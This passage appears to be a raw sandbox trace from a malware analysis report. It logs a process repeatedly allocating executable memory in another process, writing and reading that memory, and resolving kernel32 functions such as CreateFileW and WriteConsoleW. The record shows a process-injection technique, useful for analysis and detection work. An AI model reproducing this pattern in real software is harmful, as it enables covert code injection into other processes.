(hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.409] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e850b0 | out: hHeap=0x2150000) returned 1 [0184.409] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.410] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.410] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.410] lstrlenA (lpString="SetFilePointerEx") returned 16 [0184.410] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.410] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d97a*, nSize=0x11, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d97a*, lpNumberOfBytesWritten=0xcd978*=0x11) returned 1 [0184.411] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.411] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c00 [0184.411] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.411] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84c00*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84c00*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.455] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.456] ResetEvent (hEvent=0x794) returned 1 [0184.456] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.456] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.456] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84c00 | out: hHeap=0x2150000) returned 1 [0184.456] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.457] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.457] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.457] lstrlenA (lpString="CreateFileW") returned 11 [0184.457] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.457] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d98e*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d98e*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0184.458] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e846f0 [0184.458] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.458] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e846f0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e846f0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.458] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.459] ResetEvent (hEvent=0x794) returned 1 [0184.459] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.459] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.459] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e846f0 | out: hHeap=0x2150000) returned 1 [0184.459] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.460] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.460] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.460] lstrlenA (lpString="WriteConsoleW") returned 13 [0184.460] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.460] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d99c*, nSize=0xe, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d99c*, lpNumberOfBytesWritten=0xcd978*=0xe) returned 1 [0184.460] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84840 [0184.461] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.461] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84840*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84840*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.461] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.461] ResetEvent (hEvent=0x794) returned 1 [0184.462] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.462] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.462] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.462] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84840 | out: hHeap=0x2150000) returned 1 [0184.462] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.462] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.463] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.463] lstrlenA (lpString="DeleteCriticalSection") returned 21 [0184.463] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.463] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d456*, nSize=0x16, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d456*, lpNumberOfBytesWritten=0xcd978*=0x16) returned 1 [0184.463] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.463] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84bd0 [0184.463] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.463] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84bd0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84bd0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.464] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.464] ResetEvent (hEvent=0x794) returned 1 [0184.464] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.464] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.465] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.465] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84bd0 | out: hHeap=0x2150000) returned 1 [0184.465] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.465] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.465] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.465] lstrlenA (lpString="MultiByteToWideChar") returned 19 [0184.465] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.466] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d502*, nSize=0x14, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d502*, lpNumberOfBytesWritten=0xcd978*=0x14) returned 1 [0184.466] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.466] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85050 [0184.466] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.466] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85050*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85050*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.467] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.467] ResetEvent (hEvent=0x794) returned 1 [0184.467] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.467] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.467] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.468] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85050 | out: hHeap=0x2150000) returned 1 [0184.468] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.468] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.468] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.468] lstrlenA (lpString="WideCharToMultiByte") returned 19 [0184.468] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.468] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d518*, nSize=0x14, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d518*, lpNumberOfBytesWritten=0xcd978*=0x14) returned 1 [0184.469] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.469] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85080 [0184.469] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.469] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85080*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85080*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.469] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.470] ResetEvent (hEvent=0x794) returned 1 [0184.470] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.470] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.470] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.470] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85080 | out: hHeap=0x2150000) returned 1 [0184.470] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.471] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.471] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.471] lstrlenA (lpString="EncodePointer") returned 13 [0184.471] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.471] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d52e*, nSize=0xe, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d52e*, lpNumberOfBytesWritten=0xcd978*=0xe) returned 1 [0184.471] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.471] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e850e0 [0184.471] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.472] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e850e0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e850e0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.472] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.472] ResetEvent (hEvent=0x794) returned 1 [0184.472] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.475] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.475] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.475] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e850e0 | out: hHeap=0x2150000) returned 1 [0184.475] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.475] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.475] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.475] lstrlenA (lpString="DecodePointer") returned 13 [0184.475] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.476] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d53e*, nSize=0xe, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d53e*, lpNumberOfBytesWritten=0xcd978*=0xe) returned 1 [0184.476] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.476] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84960 [0184.476] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.476] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84960*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84960*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.477] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.477] ResetEvent (hEvent=0x794) returned 1 [0184.477] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.477] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.477] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.477] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84960 | out: hHeap=0x2150000) returned 1 [0184.477] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.478] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.478] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.478] lstrlenA (lpString="GetCPInfo") returned 9 [0184.478] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.478] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d54e*, nSize=0xa, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d54e*, lpNumberOfBytesWritten=0xcd978*=0xa) returned 1 [0184.479] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.479] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c30 [0184.479] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.479] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84c30*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84c30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.479] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.480] ResetEvent (hEvent=0x794) returned 1 [0184.480] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.480] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.480] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.480] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84c30 | out: hHeap=0x2150000) returned 1 [0184.480] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.480] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.480] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.481] lstrlenA (lpString="CompareStringW") returned 14 [0184.481] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.481] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d55a*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d55a*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0184.481] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.482] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84b10 [0184.482] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.482] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84b10*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84b10*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.482] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.483] ResetEvent (hEvent=0x794) returned 1 [0184.483] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.483] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.483] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.483] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84b10 | out: hHeap=0x2150000) returned 1 [0184.483] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.483] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.484] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.484] lstrlenA (lpString="LCMapStringW") returned 12 [0184.484] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.484] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d56c*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d56c*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0184.484] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.484] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85200 [0184.484] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.485] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85200*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85200*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.485] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.485] ResetEvent (hEvent=0x794) returned 1 [0184.485] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.486] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.486] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.486] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85200 | out: hHeap=0x2150000) returned 1 [0184.486] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.486] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.486] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.486] lstrlenA (lpString="GetLocaleInfoW") returned 14 [0184.486] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.487] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d57c*, nSize=0xf, 